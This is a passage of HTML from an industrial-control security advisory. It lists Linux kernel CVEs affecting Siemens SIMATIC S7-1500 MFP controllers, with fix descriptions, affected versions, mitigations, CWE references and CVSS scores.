drivers/net/ethernet/wangxun/txgbe/txgbe_phy.c drivers/net/ethernet/meta/fbnic/fbnic_phylink.c drivers/net/ethernet/tehuti/tn40_phy.c drivers/net/ethernet/mscc/ocelot_net.c Make the existing conditions dependent on the PHY device having a phydev-&gt;phy_link_change() implementation equal to the default phy_link_change() provided by phylib. Otherwise, we implicitly know that the phydev has the phylink-provided phylink_phy_change() callback, and when phylink is used, the PHY state machine always needs to be stopped/ started on the suspend/resume path. The code is structured as such that if phydev-&gt;phy_link_change() is absent, it is a matter of time until the kernel will crash - no need to further complicate the test. Thus, for the situation where the PM is not managed b ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-37945">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-37959</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Scrub packet on bpf_redirect_peer When bpf_redirect_peer is used to redirect packets to a device in another network namespace, the skb isn't scrubbed. That can lead skb information from one namespace to be "misused" in another namespace. As one example, this is causing Cilium to drop traffic when using bpf_redirect_peer to redirect packets that just went through IPsec decryption to a container namespace. The following pwru trace shows (1) the packet path from the host's XFRM layer to the container's XFRM layer where it's dropped and (2) the number of active skb extensions at each function. NETNS MARK IFACE TUPLE FUNC 4026533547 d00 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 xfrm_rcv_cb .active_extensions = (__u8)2, 4026533547 d00 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 xfrm4_rcv_cb .active_extensions = (__u8)2, 4026533547 d00 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 gro_cells_receive .active_extensions = (__u8)2, [...] 4026533547 0 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 skb_do_redirect .active_extensions = (__u8)2, 4026534999 0 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 ip_rcv .active_extensions = (__u8)2, 4026534999 0 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 ip_rcv_core .active_extensions = (__u8)2, [...] 4026534999 0 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 udp_queue_rcv_one_skb .active_extensions = (__u8)2, 4026534999 0 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 __xfrm_policy_check .active_extensions = (__u8)2, 4026534999 0 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 __xfrm_decode_session .active_extensions = (__u8)2, 4026534999 0 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 security_xfrm_decode_session .active_extensions = (__u8)2, 4026534999 0 eth0 10.244.3.124:35473-&gt;10.244.2.158:53 kfree_skb_reason(SKB_DROP_REASON_XFRM_POLICY) .active_extensions = (__u8)2, In this case, there are no XFRM policies in the container's network namespace so the drop is unexpected. When we decrypt the IPsec packet, the XFRM state used for decryption is set in the skb extensions. This information is preserved across the netns switch. When we reach the XFRM policy check in the container's netns, __xfrm_policy_check drops the packet with LINUX_MIB_XFRMINNOPOLS because a (container-side) XFRM policy can't be found that matches the (host-side) XFRM state used for decryption. This patch fixes this by scrubbing the packet when using bpf_redirect_peer, as is done on typical netns switches via veth devices except skb-&gt;mark and skb-&gt;tstamp are not zeroed.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-37959">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-37964</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: x86/mm: Eliminate window where TLB flushes may be inadvertently skipped tl;dr: There is a window in the mm switching code where the new CR3 is set and the CPU should be getting TLB flushes for the new mm. But should_flush_tlb() has a bug and suppresses the flush. Fix it by widening the window where should_flush_tlb() sends an IPI. Long Version: === History === There were a few things leading up to this. First, updating mm_cpumask() was observed to be too expensive, so it was made lazier. But being lazy caused too many unnecessary IPIs to CPUs due to the now-lazy mm_cpumask(). So code was added to cull mm_cpumask() periodically[2]. But that culling was a bit too aggressive and skipped sending TLB flushes to CPUs that need them. So here we are again. === Problem === The too-aggressive code in should_flush_tlb() strikes in this window: // Turn on IPIs for this CPU/mm combination, but only // if should_flush_tlb() agrees: cpumask_set_cpu(cpu, mm_cpumask(next)); next_tlb_gen = atomic64_read(&amp;next-&gt;context.tlb_gen); choose_new_asid(next, next_tlb_gen, &amp;new_asid, &amp;need_flush); load_new_mm_cr3(need_flush); // ^ After 'need_flush' is set to false, IPIs *MUST* // be sent to this CPU and not be ignored. this_cpu_write(cpu_tlbstate.loaded_mm, next); // ^ Not until this point does should_flush_tlb() // become true! should_flush_tlb() will suppress TLB flushes between load_new_mm_cr3() and writing to 'loaded_mm', which is a window where they should not be suppressed. Whoops. === Solution === Thankfully, the fuzzy "just about to write CR3" window is already marked with loaded_mm==LOADED_MM_SWITCHING. Simply checking for that state in should_flush_tlb() is sufficient to ensure that the CPU is targeted with an IPI. This will cause more TLB flush IPIs. But the window is relatively small and I do not expect this to cause any kind of measurable performance impact. Update the comment where LOADED_MM_SWITCHING is written since it grew yet another user. Peter Z also raised a concern that should_flush_tlb() might not observe 'loaded_mm' and 'is_lazy' in the same order that switch_mm_irqs_off() writes them. Add a barrier to ensure that they are observed in the order they are written.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-37964">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-37972</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: Input: mtk-pmic-keys - fix possible null pointer dereference In mtk_pmic_keys_probe, the regs parameter is only set if the button is parsed in the device tree. However, on hardware where the button is left floating, that node will most likely be removed not to enable that input. In that case the code will try to dereference a null pointer. Let's use the regs struct instead as it is defined for all supported platforms. Note that it is ok setting the key reg even if that latter is disabled as the interrupt won't be enabled anyway.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-37972">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-37980</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: block: fix resource leak in blk_register_queue() error path When registering a queue fails after blk_mq_sysfs_register() is successful but the function later encounters an error, we need to clean up the blk_mq_sysfs resources. Add the missing blk_mq_sysfs_unregister() call in the error path to properly clean up these resources and prevent a memory leak.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-37980">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38125</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: stmmac: make sure that ptp_rate is not 0 before configuring EST If the ptp_rate recorded earlier in the driver happens to be 0, this bogus value will propagate up to EST configuration, where it will trigger a division by 0. Prevent this division by 0 by adding the corresponding check and error code.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38125">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/369.html">CWE-369 Divide By Zero</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38162</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_pipapo: prevent overflow in lookup table allocation When calculating the lookup table size, ensure the following multiplication does not overflow: - desc-&gt;field_len[] maximum value is U8_MAX multiplied by NFT_PIPAPO_GROUPS_PER_BYTE(f) that can be 2, worst case. - NFT_PIPAPO_BUCKETS(f-&gt;bb) is 2^8, worst case. - sizeof(unsigned long), from sizeof(*f-&gt;lt), lt in struct nft_pipapo_field. Then, use check_mul_overflow() to multiply by bucket size and then use check_add_overflow() to the alignment for avx2 (if needed). Finally, add lt_size_check_overflow() helper and use it to consolidate this. While at it, replace leftover allocation using the GFP_KERNEL to GFP_KERNEL_ACCOUNT for consistency, in pipapo_resize().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38162">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38192</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: clear the dst when changing skb protocol A not-so-careful NAT46 BPF program can crash the kernel if it indiscriminately flips ingress packets from v4 to v6: BUG: kernel NULL pointer dereference, address: 0000000000000000 ip6_rcv_core (net/ipv6/ip6_input.c:190:20) ipv6_rcv (net/ipv6/ip6_input.c:306:8) process_backlog (net/core/dev.c:6186:4) napi_poll (net/core/dev.c:6906:9) net_rx_action (net/core/dev.c:7028:13) do_softirq (kernel/softirq.c:462:3) netif_rx (net/core/dev.c:5326:3) dev_loopback_xmit (net/core/dev.c:4015:2) ip_mc_finish_output (net/ipv4/ip_output.c:363:8) NF_HOOK (./include/linux/netfilter.h:314:9) ip_mc_output (net/ipv4/ip_output.c:400:5) dst_output (./include/net/dst.h:459:9) ip_local_out (net/ipv4/ip_output.c:130:9) ip_send_skb (net/ipv4/ip_output.c:1496:8) udp_send_skb (net/ipv4/udp.c:1040:8) udp_sendmsg (net/ipv4/udp.c:1328:10) The output interface has a 4-&gt;6 program attached at ingress. We try to loop the multicast skb back to the sending socket. Ingress BPF runs as part of netif_rx(), pushes a valid v6 hdr and changes skb-&gt;protocol to v6. We enter ip6_rcv_core which tries to use skb_dst(). But the dst is still an IPv4 one left after IPv4 mcast output. Clear the dst in all BPF helpers which change the protocol. Try to preserve metadata dsts, those may carry non-routing metadata.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38192">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.1</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38201</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_pipapo: clamp maximum map bucket size to INT_MAX Otherwise, it is possible to hit WARN_ON_ONCE in __kvmalloc_node_noprof() when resizing hashtable because __GFP_NOWARN is unset. Similar to: b541ba7d1f5a ("netfilter: conntrack: clamp maximum hashtable size to INT_MAX")</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38201">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38232</a></h3>
<div class="csaf-accordion-content">
